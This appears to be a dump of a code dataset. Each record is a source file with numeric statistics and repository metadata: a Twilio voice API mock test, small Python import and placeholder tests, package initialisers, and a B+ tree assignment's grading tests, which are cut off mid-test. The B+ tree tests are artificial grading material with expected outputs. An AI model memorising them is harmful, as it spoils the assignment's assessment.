self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets("NEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://voice.twilio.com/v1/ConnectionPolicies/NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Targets/NEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"connection_policy_sid": "NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sid": "NEaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"target": "sip:sip-box.com:1234",
"priority": 1,
"weight": 20,
"enabled": true,
"date_created": "2020-03-18T23:31:36Z",
"date_updated": "2020-03-18T23:31:37Z",
"url": "https://voice.twilio.com/v1/ConnectionPolicies/NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Targets/NEaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets("NEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.assertIsNotNone(actual)
def test_list_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets.list()
self.holodeck.assert_has_request(Request(
'get',
'https://voice.twilio.com/v1/ConnectionPolicies/NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Targets',
))
def test_read_full_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"page": 0,
"page_size": 50,
"first_page_url": "https://voice.twilio.com/v1/ConnectionPolicies/NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Targets?PageSize=50&Page=0",
"previous_page_url": null,
"url": "https://voice.twilio.com/v1/ConnectionPolicies/NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Targets?PageSize=50&Page=0",
"next_page_url": null,
"key": "targets"
},
"targets": [
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"connection_policy_sid": "NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sid": "NEaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"target": "sip:sip-box.com:1234",
"priority": 1,
"weight": 20,
"enabled": true,
"date_created": "2020-03-18T23:31:36Z",
"date_updated": "2020-03-18T23:31:37Z",
"url": "https://voice.twilio.com/v1/ConnectionPolicies/NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Targets/NEaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
]
}
'''
))
actual = self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets.list()
self.assertIsNotNone(actual)
def test_read_empty_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"page": 0,
"page_size": 50,
"first_page_url": "https://voice.twilio.com/v1/ConnectionPolicies/NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Targets?PageSize=50&Page=0",
"previous_page_url": null,
"url": "https://voice.twilio.com/v1/ConnectionPolicies/NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Targets?PageSize=50&Page=0",
"next_page_url": null,
"key": "targets"
},
"targets": []
}
'''
))
actual = self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets.list()
self.assertIsNotNone(actual)
def test_update_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets("NEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update()
self.holodeck.assert_has_request(Request(
'post',
'https://voice.twilio.com/v1/ConnectionPolicies/NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Targets/NEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_update_response(self):
self.holodeck.mock(Response(
200,
'''
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"connection_policy_sid": "NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sid": "NEaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "updated_name",
"target": "sip:sip-updated.com:4321",
"priority": 2,
"weight": 10,
"enabled": false,
"date_created": "2020-03-18T23:31:36Z",
"date_updated": "2020-03-18T23:31:37Z",
"url": "https://voice.twilio.com/v1/ConnectionPolicies/NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Targets/NEaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets("NEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update()
self.assertIsNotNone(actual)
def test_delete_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets("NEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.holodeck.assert_has_request(Request(
'delete',
'https://voice.twilio.com/v1/ConnectionPolicies/NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Targets/NEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_delete_response(self):
self.holodeck.mock(Response(
204,
None,
))
actual = self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets("NEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.assertTrue(actual)
| 40.215859
| 157
| 0.570051
| 677
| 9,129
| 7.545052
| 0.156573
| 0.037588
| 0.04072
| 0.048356
| 0.914252
| 0.892326
| 0.872161
| 0.872161
| 0.872161
| 0.872161
| 0
| 0.03522
| 0.318874
| 9,129
| 226
| 158
| 40.393805
| 0.786266
| 0.01194
| 0
| 0.75
| 1
| 0
| 0.249897
| 0.119274
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.114583
| false
| 0
| 0.041667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e76e9d60ab85937b85c7285fc651d4e9e23993c2
| 83
|
py
|
Python
|
pyck/tests/test_lib_models.py
|
kashifpk/PyCK
|
11513c6b928d37afcf83de717e8d2f74fce731af
|
[
"Ruby"
] | 2
|
2015-01-11T22:23:58.000Z
|
2016-05-17T06:57:57.000Z
|
pyck/tests/test_lib_models.py
|
kashifpk/PyCK
|
11513c6b928d37afcf83de717e8d2f74fce731af
|
[
"Ruby"
] | 31
|
2015-01-14T11:30:50.000Z
|
2017-01-31T14:35:48.000Z
|
pyck/tests/test_lib_models.py
|
kashifpk/PyCK
|
11513c6b928d37afcf83de717e8d2f74fce731af
|
[
"Ruby"
] | null | null | null |
from pyck.forms import Form
import os
def test_pyck_lib_get_models_1():
pass # placeholder test: no assertions implemented yet
| 11.857143
| 33
| 0.771084
| 15
| 83
| 3.933333
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014706
| 0.180723
| 83
| 6
| 34
| 13.833333
| 0.852941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
e79bb28278e6f20d27b9dc67440e52d0d9453c3d
| 184
|
py
|
Python
|
pbrl/algorithms/td3/__init__.py
|
jjccero/rl
|
45d1a464ec661278372fce2c1d972d02457e21f6
|
[
"MIT"
] | 11
|
2021-08-28T09:38:01.000Z
|
2021-09-18T05:15:23.000Z
|
pbrl/algorithms/td3/__init__.py
|
jjccero/rl
|
45d1a464ec661278372fce2c1d972d02457e21f6
|
[
"MIT"
] | null | null | null |
pbrl/algorithms/td3/__init__.py
|
jjccero/rl
|
45d1a464ec661278372fce2c1d972d02457e21f6
|
[
"MIT"
] | null | null | null |
from pbrl.algorithms.td3.buffer import ReplayBuffer
from pbrl.algorithms.td3.policy import Policy
from pbrl.algorithms.td3.runner import Runner
from pbrl.algorithms.td3.td3 import TD3
| 36.8
| 51
| 0.847826
| 28
| 184
| 5.571429
| 0.321429
| 0.205128
| 0.461538
| 0.538462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035714
| 0.086957
| 184
| 4
| 52
| 46
| 0.892857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
99becf3a9198b9adf3b9ce47327d5ac5748aefdb
| 182
|
py
|
Python
|
limix_ext/gcta/core/plink_/test/test_write.py
|
glimix/limix-ext
|
7cf7a3b2b02f6a73cbba90f1945a06b9295b7357
|
[
"MIT"
] | null | null | null |
limix_ext/gcta/core/plink_/test/test_write.py
|
glimix/limix-ext
|
7cf7a3b2b02f6a73cbba90f1945a06b9295b7357
|
[
"MIT"
] | 2
|
2017-06-05T08:29:22.000Z
|
2017-06-07T16:54:54.000Z
|
limix_ext/gcta/core/plink_/test/test_write.py
|
glimix/limix-ext
|
7cf7a3b2b02f6a73cbba90f1945a06b9295b7357
|
[
"MIT"
] | null | null | null |
def test_plink_write_map():
# import-only smoke test: fails if write_map cannot be imported
from limix_ext.gcta.core.plink_.write import write_map
def test_plink_write_phen():
# import-only smoke test: fails if write_phen_int cannot be imported
from limix_ext.gcta.core.plink_.write import write_phen_int
| 26
| 63
| 0.802198
| 31
| 182
| 4.290323
| 0.419355
| 0.300752
| 0.180451
| 0.255639
| 0.616541
| 0.616541
| 0.616541
| 0.616541
| 0.616541
| 0
| 0
| 0
| 0.120879
| 182
| 6
| 64
| 30.333333
| 0.83125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0.5
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
99c1b343df331d6278cd13f141dead0916127b43
| 205
|
py
|
Python
|
bitmovin/resources/models/encodings/start/manifests/__init__.py
|
bitmovin/bitmovin-python
|
d183718d640117dd75141da261901dc2f60433b0
|
[
"Unlicense"
] | 44
|
2016-12-12T17:37:23.000Z
|
2021-03-03T09:48:48.000Z
|
bitmovin/resources/models/encodings/start/manifests/__init__.py
|
bitmovin/bitmovin-python
|
d183718d640117dd75141da261901dc2f60433b0
|
[
"Unlicense"
] | 38
|
2017-01-09T14:45:45.000Z
|
2022-02-27T18:04:33.000Z
|
bitmovin/resources/models/encodings/start/manifests/__init__.py
|
bitmovin/bitmovin-python
|
d183718d640117dd75141da261901dc2f60433b0
|
[
"Unlicense"
] | 27
|
2017-02-02T22:49:31.000Z
|
2019-11-21T07:04:57.000Z
|
from .start_manifest import StartManifest
from .vod_start_manifest import VodStartManifest
from .vod_dash_start_manifest import VodDashStartManifest
from .vod_hls_start_manifest import VodHlsStartManifest
| 41
| 57
| 0.902439
| 25
| 205
| 7.04
| 0.44
| 0.295455
| 0.431818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078049
| 205
| 4
| 58
| 51.25
| 0.931217
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
99d633c413ed4419ef6c1a8c94ee7795582ddb61
| 21,505
|
py
|
Python
|
query-opt/py/tests.py
|
sean-chester/relational-databases
|
9d1d2da00d7d7517c34aab80bb1bcae930a2e706
|
[
"Unlicense"
] | null | null | null |
query-opt/py/tests.py
|
sean-chester/relational-databases
|
9d1d2da00d7d7517c34aab80bb1bcae930a2e706
|
[
"Unlicense"
] | null | null | null |
query-opt/py/tests.py
|
sean-chester/relational-databases
|
9d1d2da00d7d7517c34aab80bb1bcae930a2e706
|
[
"Unlicense"
] | 8
|
2022-03-02T19:39:03.000Z
|
2022-03-22T06:21:25.000Z
|
# Test cases for ImplementMe class.
# The mocked objects (and therefore expected output) may change
# at the point of evaluation, including into a more complex object,
# but the functionality tested by each test case will not.
# Your implementation should anticipate ways in which these mocks could
# be more complex.
#
# Three cases are not yet disclosed; they will be challenging combinations
# of existing test cases.
import unittest
import time
import timeout_decorator
from node import *
from index import *
from implement_me import ImplementMe
# Insert into an empty tree
class TestCase01(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_insertion(self):
        btree = Index([])
        key = 99
        expected_output = Index([Node()]*1)
        expected_output.nodes[ 0 ] = Node(\
            KeySet((99, -1)),\
            PointerSet((0,0,0)))
        self.assertEqual( expected_output, ImplementMe.InsertIntoIndex( btree, key ) )
# Insert existing key
class TestCase02(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_insertion(self):
        btree = Index([Node()]*1)
        btree.nodes[ 0 ] = Node(\
            KeySet((99, -1)),\
            PointerSet((0,0,0)))
        key = 99
        expected_output = Index([Node()]*1)
        expected_output.nodes[ 0 ] = Node(\
            KeySet((99, -1)),\
            PointerSet((0,0,0)))
        self.assertEqual( expected_output, ImplementMe.InsertIntoIndex( btree, key ) )
# Insert into existing node that is not full
class TestCase03(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_insertion(self):
        btree = Index([Node()]*1)
        btree.nodes[ 0 ] = Node(\
            KeySet((87, -1)),\
            PointerSet((0,0,0)))
        key = 66
        expected_output = Index([Node()]*1)
        expected_output.nodes[ 0 ] = Node(\
            KeySet((66, 87)),\
            PointerSet((0,0,0)))
        self.assertEqual( expected_output, ImplementMe.InsertIntoIndex( btree, key ) )
# Insert into full node.
class TestCase04(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_insertion(self):
        btree = Index([Node()]*1)
        btree.nodes[ 0 ] = Node(\
            KeySet((66, 99)),\
            PointerSet((0,0,0)))
        key = 87
        expected_output = Index([Node()]*4)
        expected_output.nodes[0] = Node(\
            KeySet((87, -1)),\
            PointerSet((1,2,0)))
        expected_output.nodes[1] = Node(\
            KeySet((66,-1)),\
            PointerSet((0,0,2)))
        expected_output.nodes[2]=Node(\
            KeySet((87,99)),\
            PointerSet((0,0,0)))
        self.assertEqual( expected_output, ImplementMe.InsertIntoIndex( btree, key ) )
# Insert into full node with full parent, causing root split.
class TestCase05(unittest.TestCase):
    @timeout_decorator.timeout(25)
    def test_insertion(self):
        btree = Index([Node()]*4)
        btree.nodes[0] = Node(\
            KeySet((42, 66)),\
            PointerSet((1,2,3)))
        btree.nodes[1] = Node(\
            KeySet((7,-1)),\
            PointerSet((0,0,2)))
        btree.nodes[2]=Node(\
            KeySet((42,-1)),\
            PointerSet((0,0,3)))
        btree.nodes[3]=Node(\
            KeySet((66,87)),\
            PointerSet((0,0,0)))
        key = 99
        expected_output = Index([Node()]*13)
        expected_output.nodes[0] = Node(\
            KeySet((66, -1)),\
            PointerSet((1,2,0)))
        expected_output.nodes[1] = Node(\
            KeySet((42,-1)),\
            PointerSet((4,5,0)))
        expected_output.nodes[2]=Node(\
            KeySet((87,-1)),\
            PointerSet((7,8,0)))
        expected_output.nodes[4]=Node(\
            KeySet((7,-1)),\
            PointerSet((0,0,5)))
        expected_output.nodes[5]=Node(\
            KeySet((42,-1)),\
            PointerSet((0,0,7)))
        expected_output.nodes[7]=Node(\
            KeySet((66,-1)),\
            PointerSet((0,0,8)))
        expected_output.nodes[8]=Node(\
            KeySet((87,99)),\
            PointerSet((0,0,0)))
        self.assertEqual( expected_output, ImplementMe.InsertIntoIndex( btree, key ) )
# Insert into full node with full parent, but does not cause a root split.
# Note that only the path that should be affected has correct data (testing complexity)
# Linearisation forces copy of some nodes to new addresses
class TestCase06(unittest.TestCase):
    @timeout_decorator.timeout(25)
    def test_insertion(self):
        btree = Index([Node()]*13)
        btree.nodes[0] = Node(\
            KeySet((7, -1)),\
            PointerSet((1,2,0)))
        btree.nodes[2]=Node(\
            KeySet((27,66)),\
            PointerSet((7,8,9)))
        btree.nodes[6]=Node(\
            KeySet((11,11)),\
            PointerSet((0,0,90))) # Dummy data for test
        btree.nodes[7]=Node(\
            KeySet((7,9)),\
            PointerSet((0,0,8)))
        btree.nodes[8]=Node(\
            KeySet((27,-1)),\
            PointerSet((0,0,9)))
        btree.nodes[9]=Node(\
            KeySet((66,88)),\
            PointerSet((0,0,0)))
        key = 12
        expected_output = Index([Node()]*13)
        expected_output.nodes[0] = Node(\
            KeySet((7, 27)),\
            PointerSet((1,2,3)))
        expected_output.nodes[2] = Node(\
            KeySet((9,-1)),\
            PointerSet((7,8,0)))
        expected_output.nodes[3]=Node(\
            KeySet((66,-1)),\
            PointerSet((10,11,0)))
        expected_output.nodes[6]=Node(\
            KeySet((11,11)),\
            PointerSet((0,0,90))) # Dummy data for test
        expected_output.nodes[7]=Node(\
            KeySet((7,-1)),\
            PointerSet((0,0,8)))
        expected_output.nodes[8]=Node(\
            KeySet((9,12)),\
            PointerSet((0,0,10)))
        expected_output.nodes[10]=Node(\
            KeySet((27,-1)),\
            PointerSet((0,0,11)))
        expected_output.nodes[11]=Node(\
            KeySet((66,88)),\
            PointerSet((0,0,0)))
        self.assertEqual( expected_output, ImplementMe.InsertIntoIndex( btree, key ) )
# Insertion causes splits that propagates at least three times
# Note that only the path that should be affected has correct data (testing complexity)
# Linearisation forces copy of some nodes to new addresses
class TestCase07(unittest.TestCase):
    @timeout_decorator.timeout(25)
    def test_insertion(self):
        btree = Index([Node()]*13)
        btree.nodes[0] = Node(\
            KeySet((7, 99)),\
            PointerSet((1,2,0)))
        btree.nodes[2]=Node(\
            KeySet((27,66)),\
            PointerSet((7,8,9)))
        btree.nodes[7]=Node(\
            KeySet((7,9)),\
            PointerSet((0,0,8)))
        btree.nodes[8]=Node(\
            KeySet((27,-1)),\
            PointerSet((0,0,9)))
        btree.nodes[9]=Node(\
            KeySet((66,88)),\
            PointerSet((0,0,0)))
        key = 12
        expected_output = Index([Node()]*40)
        expected_output.nodes[0] = Node(\
            KeySet((27, -1)),\
            PointerSet((1,2,0)))
        expected_output.nodes[1] = Node(\
            KeySet((7, -1)),\
            PointerSet((4,5,0)))
        expected_output.nodes[2] = Node(\
            KeySet((99, -1)),\
            PointerSet((7,8,0)))
        expected_output.nodes[5] = Node(\
            KeySet((9,-1)),\
            PointerSet((16,17,0)))
        expected_output.nodes[7]=Node(\
            KeySet((66,-1)),\
            PointerSet((22,23,0)))
        expected_output.nodes[16]=Node(\
            KeySet((7,-1)),\
            PointerSet((0,0,17)))
        expected_output.nodes[17]=Node(\
            KeySet((9,12)),\
            PointerSet((0,0,22)))
        expected_output.nodes[22]=Node(\
            KeySet((27,-1)),\
            PointerSet((0,0,23)))
        expected_output.nodes[23]=Node(\
            KeySet((66,88)),\
            PointerSet((0,0,0)))
        self.assertEqual( expected_output, ImplementMe.InsertIntoIndex( btree, key ) )
# Boundary case: lookup smallest key in tree
# Fake data in last node to test complexity
class TestCase08(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_lookup(self):
        btree = Index([Node()]*4)
        btree.nodes[0] = Node(\
            KeySet((42, 66)),\
            PointerSet((1,2,3)))
        btree.nodes[1] = Node(\
            KeySet((9,-1)),\
            PointerSet((0,0,2)))
        btree.nodes[2]=Node(\
            KeySet((42,-1)),\
            PointerSet((0,0,3)))
        btree.nodes[3]=Node(\
            KeySet((66,7)),\
            PointerSet((0,0,0)))
        key = 9
        expected_output = True
        self.assertEqual( expected_output, ImplementMe.LookupKeyInIndex( btree, key ) )
# Boundary case: lookup largest key in tree
# Fake data in first node to test complexity
class TestCase09(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_lookup(self):
        btree = Index([Node()]*4)
        btree.nodes[0] = Node(\
            KeySet((42, 66)),\
            PointerSet((1,2,3)))
        btree.nodes[1] = Node(\
            KeySet((7,99)),\
            PointerSet((0,0,2)))
        btree.nodes[2]=Node(\
            KeySet((42,-1)),\
            PointerSet((0,0,3)))
        btree.nodes[3]=Node(\
            KeySet((66,87)),\
            PointerSet((0,0,0)))
        key = 87
        expected_output = True
        self.assertEqual( expected_output, ImplementMe.LookupKeyInIndex( btree, key ) )
# Lookup key outside range of tree's keys
# Fake data in middle leaf to test complexity
class TestCase10(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_lookup(self):
        btree = Index([Node()]*4)
        btree.nodes[0] = Node(\
            KeySet((42, 66)),\
            PointerSet((1,2,3)))
        btree.nodes[1] = Node(\
            KeySet((9,-1)),\
            PointerSet((0,0,2)))
        btree.nodes[2]=Node(\
            KeySet((7,-1)),\
            PointerSet((0,0,3)))
        btree.nodes[3]=Node(\
            KeySet((66,99)),\
            PointerSet((0,0,0)))
        key = 7
        expected_output = False
        self.assertEqual( expected_output, ImplementMe.LookupKeyInIndex( btree, key ) )
# Lookup key within tree's range but not in tree
# Fake data in one leaf to test complexity
class TestCase11(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_lookup(self):
        btree = Index([Node()]*4)
        btree.nodes[0] = Node(\
            KeySet((42, 66)),\
            PointerSet((1,2,3)))
        btree.nodes[1] = Node(\
            KeySet((7,-1)),\
            PointerSet((0,0,2)))
        btree.nodes[2]=Node(\
            KeySet((42,-1)),\
            PointerSet((0,0,3)))
        btree.nodes[3]=Node(\
            KeySet((66,9)),\
            PointerSet((0,0,0)))
        key = 9
        expected_output = False
        self.assertEqual( expected_output, ImplementMe.LookupKeyInIndex( btree, key ) )
# Lookup key strictly within the tree's range
class TestCase12(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_lookup(self):
        btree = Index([Node()]*4)
        btree.nodes[0] = Node(\
            KeySet((41, 66)),\
            PointerSet((1,2,3)))
        btree.nodes[1] = Node(\
            KeySet((7,-1)),\
            PointerSet((0,0,2)))
        btree.nodes[2]=Node(\
            KeySet((42,-1)),\
            PointerSet((0,0,3)))
        btree.nodes[3]=Node(\
            KeySet((66,99)),\
            PointerSet((0,0,0)))
        key = 42
        expected_output = True
        self.assertEqual( expected_output, ImplementMe.LookupKeyInIndex( btree, key ) )
# Range query fully contained in one leaf node
# Fake data in other node to test complexity
class TestCase13(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_range(self):
        btree = Index([Node()]*4)
        btree.nodes[0] = Node(\
            KeySet((42, 66)),\
            PointerSet((1,2,3)))
        btree.nodes[1] = Node(\
            KeySet((7,68)),\
            PointerSet((0,0,2)))
        btree.nodes[2]=Node(\
            KeySet((42,-1)),\
            PointerSet((0,0,3)))
        btree.nodes[3]=Node(\
            KeySet((66,99)),\
            PointerSet((0,0,0)))
        lower_bound = 66
        upper_bound = 87
        expected_output = [66]
        self.assertEqual( expected_output, ImplementMe.RangeSearchInIndex( btree, lower_bound, upper_bound ) )
# Range query half-open to the left
# Fake data in one node to test complexity.
class TestCase14(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_range(self):
        btree = Index([Node()]*4)
        btree.nodes[0] = Node(\
            KeySet((42, 66)),\
            PointerSet((1,2,3)))
        btree.nodes[1] = Node(\
            KeySet((7,-1)),\
            PointerSet((0,0,2)))
        btree.nodes[2]=Node(\
            KeySet((42,-1)),\
            PointerSet((0,0,3)))
        btree.nodes[3]=Node(\
            KeySet((66,9)),\
            PointerSet((0,0,0)))
        lower_bound = 0
        upper_bound = 42
        expected_output = [7]
        self.assertEqual( expected_output, ImplementMe.RangeSearchInIndex( btree, lower_bound, upper_bound ) )
# Range query half-open to the right
# Fake data in one node to test complexity
class TestCase15(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_range(self):
        btree = Index([Node()]*4)
        btree.nodes[0] = Node(\
            KeySet((42, 66)),\
            PointerSet((1,2,3)))
        btree.nodes[1] = Node(\
            KeySet((7,68)),\
            PointerSet((0,0,2)))
        btree.nodes[2]=Node(\
            KeySet((42,-1)),\
            PointerSet((0,0,3)))
        btree.nodes[3]=Node(\
            KeySet((66,87)),\
            PointerSet((0,0,0)))
        lower_bound = 42
        upper_bound = 99
        expected_output = [42,66,87]
        self.assertEqual( expected_output, ImplementMe.RangeSearchInIndex( btree, lower_bound, upper_bound ) )
# Range query with matching upper and lower bound
# Key not in tree but found as fake data in a different node to test complexity
class TestCase16(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_range(self):
        btree = Index([Node()]*4)
        btree.nodes[0] = Node(\
            KeySet((42, 66)),\
            PointerSet((1,2,3)))
        btree.nodes[1] = Node(\
            KeySet((7,-1)),\
            PointerSet((0,0,2)))
        btree.nodes[2]=Node(\
            KeySet((42,-1)),\
            PointerSet((0,0,3)))
        btree.nodes[3]=Node(\
            KeySet((66,7)),\
            PointerSet((0,0,0)))
        lower_bound = 7
        upper_bound = 7
        expected_output = []
        self.assertEqual( expected_output, ImplementMe.RangeSearchInIndex( btree, lower_bound, upper_bound ) )
# Multi-leaf range query in middle of tree
# Fake data in first node to test complexity
class TestCase17(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_range(self):
        btree = Index([Node()]*4)
        btree.nodes[0] = Node(\
            KeySet((42, 66)),\
            PointerSet((1,2,3)))
        btree.nodes[1] = Node(\
            KeySet((68,-1)),\
            PointerSet((0,0,2)))
        btree.nodes[2]=Node(\
            KeySet((42,-1)),\
            PointerSet((0,0,3)))
        btree.nodes[3]=Node(\
            KeySet((66,99)),\
            PointerSet((0,0,0)))
        lower_bound = 42
        upper_bound = 87
        expected_output = [42,66]
        self.assertEqual( expected_output, ImplementMe.RangeSearchInIndex( btree, lower_bound, upper_bound ) )
# Lookup recently added key
class TestCase18(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_unknown(self):
        btree = Index([Node()]*13)
        btree.nodes[0] = Node(\
            KeySet((7, 99)),\
            PointerSet((1,2,3)))
        btree.nodes[2]=Node(\
            KeySet((27,66)),\
            PointerSet((7,8,9)))
        btree.nodes[7]=Node(\
            KeySet((7,9)),\
            PointerSet((0,0,8)))
        btree.nodes[8]=Node(\
            KeySet((27,-1)),\
            PointerSet((0,0,9)))
        btree.nodes[9]=Node(\
            KeySet((66,88)),\
            PointerSet((0,0,0)))
        key = 12
        expected_output = True
        self.assertEqual( expected_output, ImplementMe.LookupKeyInIndex(\
            ImplementMe.InsertIntoIndex( btree, key ), key ) )
# Lookup range that includes recently added key
class TestCase19(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_unknown(self):
        btree = Index([Node()]*13)
        btree.nodes[0] = Node(\
            KeySet((7, 99)),\
            PointerSet((1,2,3)))
        btree.nodes[2]=Node(\
            KeySet((27,66)),\
            PointerSet((7,8,9)))
        btree.nodes[7]=Node(\
            KeySet((7,9)),\
            PointerSet((0,0,8)))
        btree.nodes[8]=Node(\
            KeySet((27,-1)),\
            PointerSet((0,0,9)))
        btree.nodes[9]=Node(\
            KeySet((66,88)),\
            PointerSet((0,0,0)))
        key = 12
        lower_bound = 12
        upper_bound = 66
        expected_output = [12,27]
        self.assertEqual( expected_output, ImplementMe.RangeSearchInIndex(\
            ImplementMe.InsertIntoIndex( btree, key ), lower_bound, upper_bound ) )
# Lookup range with nearly matching lower and upper bound equal to recently added key
class TestCase20(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_unknown(self):
        btree = Index([Node()]*13)
        btree.nodes[0] = Node(\
            KeySet((7, 99)),\
            PointerSet((1,2,3)))
        btree.nodes[2]=Node(\
            KeySet((27,66)),\
            PointerSet((7,8,9)))
        btree.nodes[7]=Node(\
            KeySet((7,9)),\
            PointerSet((0,0,8)))
        btree.nodes[8]=Node(\
            KeySet((27,-1)),\
            PointerSet((0,0,9)))
        btree.nodes[9]=Node(\
            KeySet((66,88)),\
            PointerSet((0,0,0)))
        key = 12
        lower_bound = 12
        upper_bound = 13
